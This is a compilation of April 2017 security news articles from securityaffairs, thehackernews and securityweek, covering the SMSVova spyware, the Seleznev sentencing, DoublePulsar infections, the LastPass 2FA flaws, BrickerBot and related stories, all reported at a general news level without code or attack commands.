English Articles -

Úvod  0  1  2  3  4  5  6  7  8  9  10  11  12  13  14  15  16  17  18  19  20  21  22  23  24  25  26  27  28  29  30  31  32  33  34  35  36  37  38  39  40  41  42  43  44  45  46  47  48  49  50 


 


Fake app hiding a SMSVova spyware went undetected for years in the Google Play Stores
23.4.2017 securityaffairs Android

Millions of users looking to get software updates have downloaded an app hiding a spyware called SMSVova through the official Google Play store.
Bad news for millions of Android users looking to get software updates, they have been tricked into downloading a spyware called SMSVova through the official Google Play store.

Experts at Zscaler discovered that the bogus app was posing as a legitimate application called “System Update” and claiming to provide users with access to the latest Android software release.

SMSVova spyware

It has been estimated that the fake application hiding the SMSVova spyware was uploaded in the Google Play in 2014, and has been downloaded between 1,000,000 and 5,000,000 times.

Experts reported the discovery to Google that promptly removed it from the store.

The SMSVova spyware was developed to track the physical location of the users, it was controlled by attackers via SMS messages.

“In our ongoing effort to hunt malware, the Zscaler ThreatLabz team came across a highly suspicious app on the U.S. Google Play Store that has been downloaded between one and five million times since 2014.” reads the analysis published Zscaler. “Upon analysis, we found it to be an SMS-based Spyware, which can steal and relay a victim’s location to an attacker in real time.”

According to Zscaler, once the app was installed when users try to open it they were displayed the message:

‘Unfortunately, Update Service has stopped.’

SMSVova spyware 2

then the app hides itself from the main screen and launches the phone’s MyLocationService which collect location data and stores it in the Shared Preferences directory of the mobile device.

Despite the error message, the spyware sets up an Android service and broadcast receiver:

MyLocationService: Fetches last known location
IncomingSMS (Receiver): Scans for incoming SMS message
SMSVova monitors specific incoming SMS messages with specific characteristics, messages with more than 23 characters in length and that contain the text string “vova-” and “get faq.”

“Once the spyware has been installed on the victim’s device, an attacker can send an SMS message ‘get faq’ and this spyware will respond with a set of commands,” according to Zscaler.

The SMSVova spyware implements other commands, including “changing current password” and “setting low battery notification.” According to Desai, those behind the spyware use the SMS commands in order to instruct SMSVova to retrieve and text back location data. The “setting low battery notification” message is used to instruct the phone to text location data when the battery runs low.

It’s still a mystery why threat actor behind the spyware is collecting location data.

It is interesting to note that the SMS-based behavior and exception generation at the initial stage of the startup weren’t detected by the antivirus engines on VirusTotal.

Authors of the SMSVova spyware have designed the threat to evade detection by antivirus solutions and Google Play’s malware detector. The app was last updated in December 2014, at that time the controls implemented by Google weren’t so stringent, anyway the malicious code eluded Google detector for years.

It is curious to note that according to the recent Google Android Security 2016 Year In Review report, in 2016 devices that installed applications only from Google Play had fewer than 0.05 percent of potentially harmful applications installed.

“There are many apps on the Google Play store that act as a spyware; for example, those that spy on the SMS messages of one’s spouse or fetch the location of children for concerned parents. But those apps explicitly state their purpose, which is not the case with the app we analyzed for this report,” concluded the analysis.


US Court sentenced Russian hacker Roman Seleznev to 27 years in jail for hacking
23.4.2017 securityaffairs Crime

Roman Seleznev, the son of the prominent Russian Parliament member Valery Seleznev was sentenced to 27 years in jail for hacking.
The Russian hacker Roman Seleznev, aka Track2, was sentenced to 27 years in prison, he was convicted of causing $170 million in damage by hacking into point-of-sale systems.

This sentence is the longest one ever imposed in the United States for a hacking-related case.

On the defense side, the Seleznev’s defense attorney Igor Litvak explained that a 27-years sentence in prison is an absolutely inappropriate sentence for cyber theft.

Roman Seleznev is the son of one of the most prominent Russian lawmaker and Russian Parliament member Valery Seleznev.

Roman Seleznev

According to prosecutors, Seleznev targeted computers belonging to both small businesses and large financial institutions. Authorities arrested the Russian expert in the Maldives in 2014, they seized his laptop containing more than 1.7 million credit card numbers.

The Russian Foreign Ministry judged the extradition to the US as a “kidnapping” and against all norms of international law.

The stolen credit card data were offered for sale on multiple “carding” websites.

After an August 2016 trial, Seleznev was convicted on 38 counts:

10 counts of Wire Fraud
9 counts of possession of 15 or more unauthorized access devices
9 counts of obtaining information from a Protected Computer
8 counts of Intentional Damage to a Protected Computer
2 counts of Aggravated Identity Theft
“A 32-year-old Vladivostok, Russia, man was sentenced today to 27 years in prison for his computer hacking crimes that caused more than $169 million in damage to small businesses and financial institutions, announced Acting Assistant Attorney General Kenneth A. Blanco of the Justice Department’s Criminal Division and U.S. Attorney Annette L. Hayes of the Western District of Washington. “

“Roman Valeryevich Seleznev, aka Track2, was convicted in August 2016, of 38 counts related to his scheme to hack into point-of-sale computers to steal credit card numbers and sell them on dark market websites. U.S. District Judge Richard A. Jones of the Western District of Washington imposed the sentence.” reads the press release published by the DoJ.

In federal court in Seattle, prosecutors asked for a 30-year prison term because Roman Seleznev “became one of the most revered point-of-sale [POS] hackers in the criminal underworld.”

Roman Seleznev was the mastermind behind a profitable hacking scheme that implemented automated techniques to hack into POS systems and deliver malware to steal credit card data.
According to the prosecutors said his hacking campaign hit more than 3,700 businesses.

“Many of the businesses targeted by Seleznev were small businesses, and included restaurants and pizza parlors in Western Washington, including Broadway Grill in Seattle, which was forced into bankruptcy following the cyber assault. Testimony at trial revealed that Seleznev’s scheme caused approximately 3,700 financial institutions more than $169 million in losses.” continues the press release.

Roman Seleznev asked US District Court Judge Richard Jones for clemency due to his medical issues, the man explained he was injured in 2011 terrorist bombing in Morocco.

Jones rejected the Seleznev’s argumentation and told the man that the Morocco bombing “was an invitation to right your wrongs and recognize you were given a second chance in life,” but instead, he “amassed a fortune” at the expense of thousands of small business.
“Today is a bad day for hackers around the world,” said U.S. Attorney Annette L. Hayes. “As Mr. Seleznev has now learned, and others should take note – we are working closely with our law enforcement partners around the world to find, apprehend, and bring to justice those who use the internet to steal and destroy our peace of mind.”

“Whether the victims are multi-national banks or small pizza joints, we are all victims when our day-to-day transactions result in millions of dollars ending up in the wrong hands,” Hayes added.

According to the Russian MP Valery Seleznev, the sentence was “passed by man-eaters” and that his son was “abducted.”

“My son was tortured because being in jail in a foreign country after abduction is torture in itself. He is innocent,” he told RIA Novosti news agency.”


US Court Sentences Russian Lawmaker's Son to 27 Years in Jail for Hacking
22.4.2017 thehackernews Crime
The son of a prominent Russian lawmaker was sentenced on Friday by a US federal court to 27 years in prison after being convicted of stealing millions of US credit card numbers and causing some $170 million in damages to businesses and individuals.
This sentence is so far the longest sentence ever imposed in the United States for a hacking-related case.
Roman Valeryevich Seleznev, 32, the son of a Russian Parliament member of the nationalist Liberal Democratic Party (LDPR), Valery Seleznev, was arrested in 2014 while attempting to board a flight in the Maldives and then extradited to the United States.
Upon arrest, federal authorities retrieved a computer that contained over 1.7 million stolen credit card numbers.
Seleznev, also went by the moniker 'Track2' online, was convicted in August 2016 of 38 charges related to stolen credit card details, which include:
10 counts of Wire Fraud
9 counts of possession of 15 or more unauthorized access devices
9 counts of obtaining information from a Protected Computer
8 counts of Intentional Damage to a Protected Computer
2 counts of Aggravated Identity Theft
Longest Ever Hacking-Related Sentence in the United States

In federal court in Seattle, the government asked for a 30-year prison term for 38 counts, saying Seleznev not only helped grow the market for stolen credit card data but also "became one of the most revered point-of-sale [POS] hackers in the criminal underworld."
Seleznev – and potentially other cyber criminals who are unknown to the authorities – developed a hacking scheme that used automated techniques to hack into POS machines in retailers and install malware to steal copies of credit card numbers.
The lists of millions of stolen credit card numbers were then sold on various online "carding" websites and the dark web. Prosecutors said his hacking campaign hit more than 3,700 businesses.
Before his sentencing, Seleznev asked US District Court Judge Richard Jones for leniency, urging the judge to consider his medical issues, the result of being caught and injured in 2011 terrorist bombing, in deciding his prison term.
However, Jones told Seleznev that the Morocco bombing "was an invitation to right your wrongs and recognize you were given a second chance in life," but instead, you "amassed a fortune" at the expense of thousands of small business.
"Today is a bad day for hackers around the world," said U.S. Attorney Annette L. Hayes. "As Mr. Seleznev has now learned, and others should take note – we are working closely with our law enforcement partners around the world to find, apprehend, and bring to justice those who use the internet to steal and destroy our peace of mind."
"Whether the victims are multi-national banks or small pizza joints, we are all victims when our day-to-day transactions result in millions of dollars ending up in the wrong hands," Hayes added.
Russian MP: Sentence "Passed by Man-Eaters;" My Son is innocent!
Twenty-seven years in prison is an absolutely inappropriate sentence for cyber theft, Seleznev's defense attorney Igor Litvak stated on Friday.
Seleznev's arrest in the Maldives and then extradition to the United States sparked an international dispute between American and Russian authorities. The Russian Foreign Ministry even characterized the extradition as a "kidnapping" and against all norms of international law.
Russian MP Valery Seleznev, the father of Seleznev, said the sentence was "passed by man-eaters" and that his son was "abducted."
The Roman MP added that his "son was tortured because being in jail in a foreign country after abduction is torture in itself. He is innocent."
Mr. Seleznev also said that he viewed the 27-years-prison sentence as a life sentence because his son would never survive these much years in prison.


Chinese APTs targeted the South Korean THAAD anti-missile systems
22.4.2017 securityaffairs APT

According to researchers at FireEye, Chinese hackers targeted the South Korean Terminal High Altitude Area Defense (THAAD) missile system.
According to a new investigation conducted by security firm FireEye, Chinese hackers are trying to hack systems used by South Korea military to interfere with the deployment of an anti-ballistic weapons system.

The news was confirmed by the FireEye’s director of cyber-espionage analysis John Hultquist in an interview with the Wall Street Journal.

FireEye has observed cyber attacks aimed to hack the Terminal High Altitude Area Defense (THAAD) missile system. The THAAD system was designed by South Korea to protect the country from the incoming intercontinental ballistic missile (ICBMs), it is part of the Star Wars defense system.

THAAD anti missile system
South Korea is deploying Lockheed Martin’s THAAD missile defense system (Image source Ars Technica)

China has long been in opposition to the deployment of the THAAD since South Korea announced it as a key component of its defense infrastructure.

“China opposes Thaad, saying its radar system can reach deep into its own territory and compromise its security. South Korea and the U.S. say Thaad is purely defensive. The first components of the system arrived in South Korea last month and have been a key issue in the current presidential campaign there.” reported the WSJ.

According to FireEye, at least two different Chinese hacking crews were involved in cyber attacks against the South Korean military systems that in some way were linked to the design and deployment of the THAAD.

The two teams involved in the attack are the Tonto team and the notorious APT10.

“One of the two hacker groups, which FireEye dubbed Tonto Team, is tied to China’s military and based out of the northeastern Chinese city of Shenyang, where North Korean hackers are also known to be active, said Mr. Hultquist, a former senior U.S. intelligence analyst.” continues the WSJ. “FireEye believes the other, known as APT10, may be linked to other Chinese military or intelligence units.”

Hackers launched spear phishing attacks using messages with weaponized attachments. According to FireEye, at least one person felt victim of the attacks, anyway, FireEye was able to profile the threat actors and track the APTs’ movements.

“Mr. Hultquist added that an error in one of the group’s operational security provided FireEye’s analysts with new information about the group’s origins.”

China’s Ministry of Defense recently declared that People’s Liberation Army “has never supported any hacking activity.”


Hackers compromised thousands of Windows boxes using leaked NSA hack tools DOUBLEPULSAR and ETERNALBLUE
22.4.2017 securityaffairs BigBrothers

Security researcher warn of hackers compromised thousands of Windows boxes using leaked NSA hack tools DOUBLEPULSAR and ETERNALBLUE
Security expert Dan Tentler, the founder of security shop Phobos Group, has observed a significant increase in the number of Windows boxes exposed on the Internet that has been hacked with DOUBLEPULSAR backdoor. The compromised windows boxes have been used for several criminal purposes such as delivering malware or used in spam campaigns.

The DOUBLEPULSAR backdoor allows attackers to inject and execute malicious code on a target system, it is installed by leveraging the ETERNALBLUE, an SMBv1 (Server Message Block 1.0) exploit that could trigger an RCE in older versions of Windows (Windows XP to Server 2008 R2).

Every Window machine running an old vulnerable version that exposes an SMB service is at risk of hack.

The DOUBLEPULSAR and ETERNALBLUE are now available for anyone after the archive of NSA tools was leaked online.

Recently Microsoft patched the SMB Server vulnerability (MS17-010) exploited by ETERNALBLUE, the security updates were released for Windows Vista SP2, Windows 7, Windows 8.1, Windows RT 8.1, Windows 10, Windows Server 2008 SP2, Windows Server 2008 R2 SP1, Windows Server 2012 and Windows Server 2012 R2, Windows Server 2016, and Server Core.

According to Tentler, who scanned the Internet for vulnerable Windows boxes, 15,196 systems have been already compromised, most of them in the US.

The expert also observed that the number of infections continues to increase.

Windows boxes compromised with the DOUBLEPULSAR implant could be easily identified observing the response to a special ping to port 445.

DOUBLEPULSAR hack

“I’m hopeful this is the wakeup moment for people over patching Windows machines.” said Tentler.
According to Tentler on Easter weekend, script kiddies worldwide launched a massive attack leveraging the DOUBLEPULSAR exploit.

The experts have no doubt, the number of DOUBLEPULSAR attacks could continue to increase in the coming week.


Leaked NSA Hacking Tools Being Used to Hack Thousands of Vulnerable Windows PCs

22.4.2017 thehackernews  BigBrothers

Script kiddies and online criminals around the world have reportedly started exploiting NSA hacking tools leaked last weekend to compromise hundreds of thousands of vulnerable Windows computers exposed on the Internet.
Last week, the mysterious hacking group known as Shadow Brokers leaked a set of Windows hacking tools targeting Windows XP, Windows Server 2003, Windows 7 and 8, and Windows 2012, allegedly belonged to the NSA's Equation Group.
What's Worse? Microsoft quickly downplayed the security risks by releasing patches for all exploited vulnerabilities, but there are still risks in the wild with unsupported systems as well as with those who haven't yet installed the patches.
Multiple security researchers have performed mass Internet scans over the past few days and found tens of thousands of Windows computers worldwide infected with DoublePulsar, a suspected NSA spying implant, as a result of a free tool released on GitHub for anyone to use.
Security researchers from Switzerland-based security firm Binary Edge performed an Internet scan and detected more than 107,000 Windows computers infected with DoublePulsar.
A separate scan done by Errata Security CEO Rob Graham detected roughly 41,000 infected machines, while another by researchers from Below0day detected more than 30,000 infected machines, a majority of which were located in the United States.
The impact? DoublePulsar is a backdoor used to inject and run malicious code on already infected systems, and is installed using the EternalBlue exploit that targets SMB file-sharing services on Microsoft's Windows XP to Server 2008 R2.
Therefore, to compromise a machine, it must be running a vulnerable version of Windows OS with an SMB service expose to the attacker.
Both DoublePulsar and EternalBlue are suspected as Equation Group tools and are now available for any script kiddie to download and use against vulnerable computers.
Once installed, DoublePulsar used hijacked computers to sling malware, spam online users, and launch further cyber attacks on other victims. To remain stealthy, the backdoor doesn't write any files to the PCs it infects, preventing it from persisting after an infected PC is rebooted.
While Microsoft has already patched majority of the exploited flaws in affected Windows operating systems, those who have not patched are vulnerable to exploits such as EternalBlue, EternalChampion, EternalSynergy, EternalRomance, EmeraldThread, and EducatedScholar.
Moreover, systems that are still using end-of-life platforms like Windows XP, Windows Server 2003, and IIS 6.0, which no longer received security updates, are also vulnerable to the in-the-wild exploits.
Since it takes hackers roughly a few hours to download the Shadow Brokers dump, scan the Internet with the tool released on Monday, and deliver hacking exploits, researchers are expecting more vulnerable and unpatched computers to fall victims to DoublePulsar.
After this news had broken, Microsoft officials released a statement saying: "We doubt the accuracy of the reports and are investigating."
Meanwhile, Windows users who haven't applied MS17-010 by now are strongly advised to download and deploy the patches as soon as possible.


Tanium Blasted for Using California Hospital Network for Sales Demos

22.4.2017 securityweek Security
Tanium Accused of Exposing California Hospital’s Network in Sales Demos Without Client Permission

Earlier this week, Orion Hindawi, CEO of systems and security management company Tanium, published an open letter covering two issues of current 'bad press'. The first is that Tanium has a toxic staff relations culture. Hindawi denies this: "Mission-oriented, hard-charging, disciplined, even intense, but not toxic."

The second issue is less easy to dismiss. It stems from an initial report in The Wall Street Journal, subsequently picked up by numerous other media outlets.

"For years, cybersecurity startup Tanium Inc. pitched its software by showing it working in the network of a hospital it said was a client..." wrote the WSJ. The problem here is that the demo was live and uncensored, giving out details of the client's name (the El Camino Hospital in Mountain View, California) and IT infrastructure, apparently without authorization to do so.

'Start-up' is a misleading description: Tanium is neither new (it was founded ten years ago), nor small (it was last valued at $3.5 billion). It has, however, been growing rapidly; and that might be part of the problem. In May 2014 it raised $90 Million in funding from Silicon Valley VC firm Andreessen Horowitz; and added a further $52 million in March 2015.

"When you start to develop a new product," Stuart Okin, SVP of Product at 1E told SecurityWeek, "the very first thing you do is solve the problem of how you are going to demonstrate it." 1E spent three months solving this problem at the start of developing Tachyon, a competing product that bears some similarities to Tanium.

Both products must scale to huge numbers, and need to be able to demonstrate this ability. Okin's solution was to develop an in-house emulator using virtual machines. Tanium doesn't seem to have had such a plan. Exactly what happened isn't clear, beyond that Tanium seems to have had a direct link into the hospital's system and was able to demonstrate the product in action, live.

In doing so, viewers would have been able to discover information about the network's infrastructure and its strengths and weaknesses -- knowledge that would have been invaluable to a potential attacker. In his letter, Hindawi acknowledges mistakes. Without mentioning El Camino, he writes, "We should have done better anonymizing that customer’s data."

But he also makes the point, "Other than the few customers who have signed those documents [allowing Tanium demonstrations] and provided us remote access to their Tanium platforms, we do not -- and in fact cannot -- demonstrate customer environments with Tanium." This implies that someone at El Camino provided the physical connection that allowed the Tanium demonstrations.

But the hospital denies this. In a separate statement, a spokesperson said, "El Camino Hospital was recently made aware that Tanium, a former third-party vendor that provided a desktop management program, had been using hospital desktop and server management information as part of a sales demonstration. El Camino Hospital was not aware of this usage and never authorized Tanium to use hospital material in any sales material or presentation."

Clearly, these two statements do not align. "This is a very embarrassing incident for the cybersecurity industry, as it undermines trust towards the large and reputable players," High-Tech Bridge CEO Ilia Kolochenko told SecurityWeek. "However, anyone can make a mistake, and prior to any conclusions or accusations, a thorough investigation should be duly performed. Many successful companies become victims of their own success -- it’s very challenging to maintain skyrocketing growth and assure that every employee respects all the internal procedures and policies in their integrity. In the cybersecurity industry, this problem is especially important, as startups grow very quickly and handle extremely sensitive data. I hope that all companies, not just Tanium, will learn a lesson and revise their internal policies and their practical enforcement."

Mistakes were certainly made, but the bottom line is that it should never have happened. "Using live customer environments for demos is a rookie move, and certainly not representative of standard practice among security software vendors," commented Okin. "There are established protocols for this -- such as demo rigs in the cloud. The 'wild west' startup approach doesn't fly in the security space, especially as these products and solutions are there to protect information, and you often find yourself engaged in heavily regulated environments."

He added that security companies should never be able to VPN into clients' infrastructures, unless it is an essential part of the service offered. This incident, he said, breaks the essential trust that is necessary between security vendor and client.


WikiLeaks Details Samsung Smart TV Hacking Tool

22.4.2017 securityweek BigBrothers
WikiLeaks has released a document detailing yet another hacking tool allegedly used by the U.S. Central Intelligence Agency (CIA). This time, the organization has published information on a tool designed to record audio via the built-in microphone of some Samsung smart TVs.

The tool, dubbed “Weeping Angel,” is apparently based on “Extending,” an implant allegedly developed by British security service MI5 – the agencies are said to have worked together on this project.

Some information on Weeping Angel was made public by WikiLeaks as part of the first Vault 7 dump, and the organization has now decided to also release a user guide.

The newly released guide, dated February 2014, describes an implant for Samsung F series smart TVs. The implant can record audio from a device via the built-in microphone and either store or exfiltrate the recordings.

The Weeping Angel implant can be installed by connecting a USB device to the targeted TV, and data can be exfiltrated either via a USB stick or a compromised Wi-Fi hotspot. However, previously leaked documents showed that its developers had been planning to add more data theft capabilities, including for browser data and Wi-Fi credentials, and even exploiting available remote access features.

SecurityWeek has reached out to Samsung for comment and will update this article if the company responds.

Last week, WikiLeaks released six documents describing a project named HIVE, which the CIA allegedly used to exfiltrate information from compromised machines and send commands to the malware found on these devices.

The whistleblower organization has also detailed hacking tools targeting security products, a framework used to make attribution and analysis of malware more difficult, and a platform designed for creating custom malware installers.

While WikiLeaks has offered to share the exploits it possesses with affected tech companies, most firms don’t seem willing to comply with WikiLeaks’ conditions for obtaining the files. Furthermore, an analysis of the available information showed that many of the vulnerabilities have already been patched.

U.S. authorities have neither confirmed nor denied the authenticity of the Vault 7 files, but reports say both the CIA and the FBI are hunting for an insider who may have provided the information to WikiLeaks.

Researchers at Symantec and Kaspersky have found links between the leaked Vault 7 files and the tools used by a cyber espionage group tracked by the security firms as Longhorn and The Lamberts, respectively.


MasterCard launches Credit Card with Built-In Fingerprint Scanner
21.4.2017 thehackernews Safety
MasterCard has unveiled its brand new payment card that has a built-in biometric fingerprint scanner, allowing customers to authorize payments with their fingerprint, without requiring a PIN code or a signature.
The company is already testing the new biometric payment cards, combined with the on-board chips, in South Africa and says it hopes to roll out the new cards to the rest of the world by the end of 2017.
Don't Worry, It Still Supports PIN-based Transactions as Fallback
Wait — If you think that this feature would not allow you to share your card with your child and spouse, don’t worry — Mastercard has a solution for this issue as well.
The company has confirmed that even if the card is configured to expect the fingerprint for authenticating a purchase, but it does still have a PIN as a fallback, in case, for some reason EMV readers fail to read fingerprint or you have yourself handed it to your child for shopping.
Stores & Retailers Don't Need New Hardware
According to Mastercard, the new biometric payment card will not require store owners and businesses to buy any new hardware, like fingerprint scanners, because the sensor in the card reads your fingerprint.
Since both the data and the scanner exist on the same card, the new payment cards work with existing EMV card terminal infrastructure — the standard chip/swipe readers you can find at many stores these days, though old magnetic stripe-only terminals won't be compatible.
But, Banks Need to Adopt New Technology
Before this new cards can be adopted worldwide, your banks or financial institution will have to get on board with the new tech.
If you want the new biometric card, you are currently required to go to your bank branch in order to have your fingers scanned and registered for the new tech. Your fingerprints will then be converted into an encrypted digital template that is stored on the card's EMV chip.
You can save up to two fingerprints, but both would have to be yours — you can not authorise someone else, even from your family, to use your card with their fingers.

Once your templates are saved, your card is ready to be used at compatible terminals across the world.
Merchants don't have to purchase new equipment to accept your fingerprint-enabled payment card but will have to update their machinery in an effort to use the new tech.
Now, while shopping at any store, just place your biometric payment card into a retailer's EMV terminal and then put your finger on the embedded sensor to pay. Your fingerprints will be verified against a template stored on your card to approve your transaction.
Can Fingerprints be Forged? And Other Concerns...
This new card is made in an attempt to make face-to-face payments more convenient and more secure, but this type of biometric verification is useless when it comes to online shopping, and so, does not provide any security over credit card frauds.
"Whether unlocking a smartphone or shopping online, the fingerprint is helping to deliver additional convenience and security," MasterCard security chief Ajay Bhalla said. "[A fingerprint is] not something that can be taken or replicated and will help our cardholders get on with their lives knowing their payments are protected."
But that isn't true.
Fingerprints can be faked, unfortunately, and we have seen previous research in which high-resolution images were used to make fake fingerprints for malicious purpose. So, criminals could put a fake fingerprint on top of their finger to shop from stolen cards.
In addition to biometric cards, MasterCard is also planning to bring contactless payments, which should function similar to mobile payments like Apple Pay where users authenticate themselves via fingerprint while holding their smartphones against the terminal.


Corporate Users Increasingly Targeted With Exploits: Kaspersky

21.4.2017 securityweek Exploit
A report published by Kaspersky Lab on Thursday shows that the number of attacks involving exploits increased significantly in 2016 compared to the previous year, but the number of attacked users actually dropped.

The security firm observed more than 700 million attempts to execute an exploit in 2016, which represents a 25% increase compared to 2015. However, the number of users attacked was only 4.3 million, compared to nearly 5.5 million in the previous year.

This indicates that while fewer users encountered exploits, the likelihood of coming across an exploit increased as the number of websites and spam messages delivering such threats has continued to grow.

Of all the exploit attacks observed by Kaspersky in 2016, more than 15% were aimed at corporate machines. The number of targeted corporate users increased from 538,000 in 2015 to 690,000 in 2016.

While Windows and web browsers were the most targeted applications in both 2015 and 2016, their share decreased significantly last year, making more room for Android and Microsoft Office exploits.

“Exploits for vulnerabilities in Office software became the absolute champions in terms of the number of attacked users. They increased by almost 103% to reach 367,167 attacked users,” Kaspersky said in its report.

The security firm said more than 297,000 users were hit by zero-day or heavily obfuscated known exploits in 2016, and the most common exploit, same as in the previous year, was CVE-2010-2568, a vulnerability leveraged by the notorious Stuxnet malware.

Between 2010 and 2016, malicious actors used more than 80 vulnerabilities in targeted attacks. The Russia-linked threat group known as APT28 and Fancy Bear leveraged 25 flaws, including at least six zero-days, followed by the NSA-linked Equation Group, which used roughly 17 vulnerabilities, including at least eight zero-days.

Groups that launched targeted attacks have mainly relied on Windows flaws, followed by Flash Player, Office, Java and Internet Explorer. The most popular vulnerability is CVE-2012-0158, which is still being used by APT actors.

Usage of exploits by APT groups


The Stuxnet vulnerability is still one of the most exploited flaws in the wild by hackers
21.4.2017 securityaffairs CyberWar

A new report published by Kaspersky confirms that Stuxnet exploits targeting a Windows Shell Vulnerability is still widely adopted by threat actors.
The case that I’m going to present you demonstrates the importance of patch management and shows the effects of the militarization of the cyberspace.

Unpatched software is an easy target for hackers that can exploit old vulnerabilities to compromise the systems running them. Let’s consider for example the exploit code used in the notorious Stuxnet cyber weapon that hit the centrifuges at the Iranian nuclear plant at Natanz.
The flaw exploited by the Stuxnet worm was first patched by Microsoft in 2010, but threat actors in the wild continue to exploit it in a huge number of cyber attack.

According to Kaspersky Lab, the flaw used by Stuxnet to target Windows machines, tracked as CVE-2010-2568 has been weaponized to remotely execute code on unpatched Windows computers.

The dangerous trend continues, in August 2014 experts from Kaspersky revealed that in the period between November 2013 and June 2014, the Windows Shell vulnerability (CVE-2010-2568) exploited by Stuxnet was detected 50 million times targeting nearly 19 million machines all over the world.

In 2015, and in 2016, roughly one of four of the Kaspersky users was targeted by an exploit code leveraging on the CVE-2010-2568.

“To take just one example, when we looked at our most recent threat statistics we found that exploits to CVE-2010-2568 (used in the notorious Stuxnet campaign) still rank first in terms of the number of users attacked. Almost a quarter of all users who encountered any exploit threat in 2016 were attacked with exploits to this vulnerability.” states a report published by Kaspersky.

Stuxnet attack

Of course, the CVE-2010-2568 vulnerability only affects very old OS, including Windows XP and Windows Server 2008, and unpatched versions of Windows 7.

Attackers most used the Stuxnet exploit code to create malicious codes that can “self-replicate” over a targeted network.

Concluding, the militarization of the cyberspace has serious consequences on Internet users, even if the malware was spread many years ago.

I suggest the reading of the research published by Kaspersky that provides interesting data on most exploited vulnerabilities and threat actors leveraging on them.


Arrest of WikiLeaks's Assange a 'Priority': US Top Cop

21.4.2017 securityweek BigBrothers
The arrest of WikiLeaks founder Julian Assange is a US "priority," Attorney General Jeff Sessions said Thursday, as media reports indicated his office was preparing charges against the fugitive anti-hero.

"We are going to step up our effort and already are stepping up our efforts on all leaks," Sessions, America's top cop, said at a news conference in response to a reporter's question about a US priority to arrest Assange.

The Justice Department chief said a rash of leaks of sensitive secrets appeared unprecedented.

"This is a matter that's gone beyond anything I'm aware of. We have professionals that have been in the security business of the United States for many years that are shocked by the number of leaks and some of them are quite serious," he said.

"Whenever a case can be made, we will seek to put some people in jail."

Prosecutors in recent weeks have been drafting a memo that looks at charges against Assange and members of WikiLeaks that possibly include conspiracy, theft of government property and violations of the Espionage Act, the Washington Post reported, citing unnamed US officials familiar with the matter.

Several other media outlets also cited unnamed officials as saying US authorities were preparing charges against Assange. The Justice Department declined to comment on the reports.

Assange, 45, has been holed up at the Ecuadoran embassy in London since 2012 trying to avoid extradition to Sweden where he faces a rape allegation that he denies.

He fears Sweden would extradite him to the United States to face trial for leaking hundreds of thousands of secret US military and diplomatic documents that first gained attention in 2010.

Assange's case returned to the spotlight after WikiLeaks was accused of meddling in the US election last year by releasing a damaging trove of hacked emails from presidential candidate Hillary Clinton's campaign and the Democratic party.

US officials say the emails were hacked with the aid of the Russian government in its bid to influence the US election.

Critics say their release late in the race helped to tip the November 8 election to Republican Donald Trump.

Trump and his administration have put heat on WikiLeaks after it embarrassed the Central Intelligence Agency last month by releasing a large number of files and computer code from the spy agency's top-secret hacking operations.

The documents showed how the CIA exploits vulnerabilities in popular computer and networking hardware and software to gather intelligence.

Supporters of WikiLeaks say it's practicing the constitutional right of freedom of speech and the press.

- 'Hostile intelligence service'-

CIA Director Mike Pompeo last week branded WikiLeaks a "hostile intelligence service," saying it threatens democratic nations and joins hands with dictators.

Pompeo focused on the anti-secrecy group and other leakers of classified information like Edward Snowden as one of the key threats facing the United States.

"WikiLeaks walks like a hostile intelligence service and talks like a hostile intelligence service. It has encouraged its followers to find jobs at CIA in order to obtain intelligence... And it overwhelmingly focuses on the United States, while seeking support from anti-democratic countries and organizations," said Pompeo.

"It is time to call out WikiLeaks for what it really is -- a non-state hostile intelligence service often abetted by state actors like Russia."

The day before Pompeo spoke, Assange published an opinion piece in The Washington Post in which he said his group's mission was the same as America's most respected newspapers: "to publish newsworthy content."

"WikiLeaks's sole interest is expressing constitutionally protected truths," he said, professing "overwhelming admiration for both America and the idea of America."


Flaws Allowed Hackers to Bypass LastPass 2FA

21.4.2017 securityweek Vulnerebility
LastPass vulnerabilities

Design flaws in LastPass’ implementation of two-factor authentication (2FA) could have been exploited by hackers to bypass the protection mechanism and gain access to user accounts.

Martin Vigo, one of the Salesforce researchers who in November 2015 reported finding several vulnerabilities in LastPass, has once again analyzed the popular password manager, particularly its 2FA mechanism.

The temporary 2FA codes are generated based on several variables, including a secret seed which is typically encoded in a QR code that the user scans with a 2FA app such as Google Authenticator.

Vigo’s tests showed that the request made when a QR code image was displayed to the user contained the login hash used by LastPass for authentication. In fact, the 2FA secret seed had been derived from the user’s password, which defeated the entire purpose of 2FA protection as the attacker presumably already possesses the password.

While determining the URL of the QR code was not difficult, a hacker needed to be authenticated for the attack to work. However, exploiting a cross-site request forgery (CSRF) vulnerability could address this problem. Getting a logged-in user to click on a specially crafted link that exploits a CSRF flaw could have allowed an attacker to obtain the QR code image.

According to Vigo, an attacker could have also leveraged cross-site scripting (XSS) vulnerabilities on popular websites to avoid having the victim visit his malicious site, which would be more likely to raise suspicion.

The researcher also found a simple way to disable 2FA using a CSRF vulnerability. As with all CSRF attacks, the hacker needed to get the victim to visit a malicious website.

LastPass was informed about these vulnerabilities on February 7 and immediately started working on patches. The company addressed the CSRF flaws, added a security mechanism for checking the origin of a QR code request, and eliminated the use of password hashes for the secret seed.

In a blog post published on Thursday, LastPass informed users that they don’t need to take any action as all the fixes have been done on the server side. The company also pointed out that exploiting the flaws required a combination of factors that made attacks more difficult.

“To exploit this issue an attacker would have needed to take several steps to bypass Google Authenticator,” LastPass said. “First, the attacker would have had to lure a user to a nefarious website. Second, the user would have to be logged in to LastPass at the time of visiting the malicious site.”

Vigo’s disclosure comes shortly after Google Project Zero researcher Tavis Ormandy reported finding several vulnerabilities in the LastPass browser extensions.


ICS-CERT Warns of BrickerBot's IoT Device Damaging Capabilities

21.4.2017 securityweek BotNet

The Department of Homeland Security’s Industrial Control Systems Cyber Emergency Response Team (ICS-CERT) has issued an alert on BrickerBot, a piece of malware designed to permanently disable Internet of Things (IoT) devices.

Discovered earlier this month, the malware is capable of what Radware researchers call Permanent Denial-of-Service (PDoS). Two versions of the malware were observed to date, both featuring the same capabilities: they can damage the compromised devices’ firmware and disable basic functions.

Citing the Radware report, ICS-CERT warns that one version of BrickerBot is targeting devices running BusyBox that have an exposed Telnet command window, and which also have SSH exposed through an older version of Dropbear SSH server. Identified as Ubiquiti network devices, most of these run outdated firmware, while some are access points or bridges with beam directivity.

BrickerBotThe second malware variant is targeting Linux-based devices both with and without BusyBox, but which expose a Telnet service secured with default or hard-coded passwords. This variant also uses TOR exit nodes to hide the source of the attack, ICS-CERT’s alert also points out.

